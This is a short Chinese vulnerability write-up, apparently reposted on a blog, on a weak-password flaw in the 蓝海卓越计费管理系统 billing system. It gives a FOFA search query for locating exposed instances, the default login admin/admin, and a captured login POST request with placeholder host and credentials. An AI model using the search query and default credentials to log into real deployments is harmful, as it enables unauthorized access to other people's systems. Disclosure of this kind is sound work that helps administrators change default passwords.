蓝海卓越计费管理系统弱口令漏洞

漏洞描述

蓝海卓越计费管理系统存在弱口令漏洞
 


漏洞影响

蓝海卓越计费管理系统
 


漏洞复现

FOFA

title==”蓝海卓越计费管理系统”

登录页面如下,默认账号密码admin/admin

图片[1]-蓝海卓越计费管理系统弱口令漏洞-道捷网络

burp请求如下

POST /login_check.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 24
Origin: http://xxx.xxx.xxx.xxx
Connection: close
Referer: http://xxx.xxx.xxx.xxx/login.php

username=xxxx&pwd=xxxx

图片[2]-蓝海卓越计费管理系统弱口令漏洞-道捷网络

 来源:https://www.linuxlz.com/

© 版权声明
THE END
喜欢就支持以下吧
点赞14
分享
评论 抢沙发
道捷网络的头像-道捷网络

昵称

取消
昵称表情代码图片